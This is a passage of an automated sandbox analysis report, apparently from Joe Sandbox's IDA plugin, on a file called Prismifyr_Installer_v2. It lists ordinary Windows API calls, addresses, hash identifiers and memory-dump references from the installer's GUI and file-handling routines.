                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1EE1797190470ADFDB24CF99C880BAAB7F5FF44305F15852EE497A7291E378AA91CB04
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 0e4e8af0329ccb159007ad6c77c0af05cb35f857c46231da8f5d0a1659340364
                                                                                                                                                                                                                          • Instruction ID: 59779062152899835760f0dc2f5c49596223a290c6efd11eddd93cbc7c663e45
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e4e8af0329ccb159007ad6c77c0af05cb35f857c46231da8f5d0a1659340364
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0FC15831E04219DBDF18CF68C8905EEBBB2BF88314F25866AC85677380D734A942CF95
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040448E
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 004044A2
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004044BF
                                                                                                                                                                                                                          • GetSysColor.USER32(?), ref: 004044D0
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044DE
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044EC
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 004044F1
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044FE
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404513
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,0000040A), ref: 0040456C
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000), ref: 00404573
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0040459E
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045E1
                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004045EF
                                                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 004045F2
                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0040460B
                                                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 0040460E
                                                                                                                                                                                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040463D
                                                                                                                                                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040464F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                                                                          • String ID: <#j$N$Remove folder: $gC@
                                                                                                                                                                                                                          • API String ID: 3103080414-3684374134
                                                                                                                                                                                                                          • Opcode ID: 96cce4fce431ccadf5917f17b99feddee1f1d895ae547b1ae29d71d99e1dfbb5
                                                                                                                                                                                                                          • Instruction ID: 3402c350d7270d9961c63d8365249516a5ebc70a9ec23ab72cb453283ebd69b0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 96cce4fce431ccadf5917f17b99feddee1f1d895ae547b1ae29d71d99e1dfbb5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7761BEB1900209BFDB009F60DD85EAA7B69FB85305F00843AF705B62D0D77D9961CF99
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                                                          • DrawTextW.USER32(00000000,00472EE0,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                          • String ID: F
                                                                                                                                                                                                                          • API String ID: 941294808-1304234792
                                                                                                                                                                                                                          • Opcode ID: bf214f377d6857cb708af565e6f61848071267d92be3f24c40ffd1659e9a65ef
                                                                                                                                                                                                                          • Instruction ID: 4eb8147a30471c2b969484520d7d1b1c24976f3a1718a772f7b725b3b94c1b26
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf214f377d6857cb708af565e6f61848071267d92be3f24c40ffd1659e9a65ef
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C418A71800249AFCF058FA5DE459AF7BB9FF44314F00842AF991AA1A0C778D954DFA4
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004060A1,?,?), ref: 00405F41
                                                                                                                                                                                                                          • GetShortPathNameW.KERNEL32(?,004688E8,00000400), ref: 00405F4A
                                                                                                                                                                                                                            • Part of subcall function 00405D15: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D25
                                                                                                                                                                                                                            • Part of subcall function 00405D15: lstrlenA.KERNEL32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D57
                                                                                                                                                                                                                          • GetShortPathNameW.KERNEL32(?,004690E8,00000400), ref: 00405F67
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00405F85
                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,004690E8,C0000000,00000004,004690E8,?,?,?,?,?), ref: 00405FC0
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FCF
                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406007
                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,004684E8,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 0040605D
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 0040606E
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406075
                                                                                                                                                                                                                            • Part of subcall function 00405DB0: GetFileAttributesW.KERNELBASE(004E7000,00402F1D,004E7000,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
                                                                                                                                                                                                                            • Part of subcall function 00405DB0: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                                                          • String ID: %ls=%ls$[Rename]
                                                                                                                                                                                                                          • API String ID: 2171350718-461813615
                                                                                                                                                                                                                          • Opcode ID: b694a888aaf83b7fce4c3b5560ec35c5a1d29ec5cfaa1e3dee45fb0367e4abd5
                                                                                                                                                                                                                          • Instruction ID: 1ccef14564d3a4e3590f6d96bf23d62cdd24cd7414a0bd79904b9c13782922cd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b694a888aaf83b7fce4c3b5560ec35c5a1d29ec5cfaa1e3dee45fb0367e4abd5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08312530641B05BBC220AB659D48F6B3AACDF45744F15003FFA42F72C2EB7C98118AAD
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\,00000000,0042CE00,762323A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(0040327A,Remove folder: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\,00000000,0042CE00,762323A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\,0040327A,0040327A,Remove folder: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\,00000000,0042CE00,762323A0), ref: 0040537D
                                                                                                                                                                                                                          • SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\), ref: 0040538F
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                                                          • String ID: Remove folder: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\
                                                                                                                                                                                                                          • API String ID: 2531174081-3048722481
                                                                                                                                                                                                                          • Opcode ID: 03d69ce82fc4e5908464ead601bb3ac1f64f2a51dd32175340e58c4215b781fb
                                                                                                                                                                                                                          • Instruction ID: c4a8b4fbc7344707c8dcd13f789004ac01d88f238d1262f53b2d1dabcf784db2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 03d69ce82fc4e5908464ead601bb3ac1f64f2a51dd32175340e58c4215b781fb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F21A171900518BBCB11AFA5DD849CFBFB9EF45350F10807AF904B62A0C7B94A80DFA8
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 004042B5
                                                                                                                                                                                                                          • GetSysColor.USER32(00000000), ref: 004042F3
                                                                                                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 004042FF
                                                                                                                                                                                                                          • SetBkMode.GDI32(?,?), ref: 0040430B
                                                                                                                                                                                                                          • GetSysColor.USER32(?), ref: 0040431E
                                                                                                                                                                                                                          • SetBkColor.GDI32(?,?), ref: 0040432E
                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00404348
                                                                                                                                                                                                                          • CreateBrushIndirect.GDI32(?), ref: 00404352
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2320649405-0
                                                                                                                                                                                                                          • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                                                                                                          • Instruction ID: a3c6a1d12b74a4a342abaca89036a15a37f51972f1e3113ed1cbee018e9c0b42
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 772156716007059BC724DF78D948B5B77F4AF81710B04893DED96A26E0D734E544CB54
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                                                                                                                                                            • Part of subcall function 00405E91: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405EA7
                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
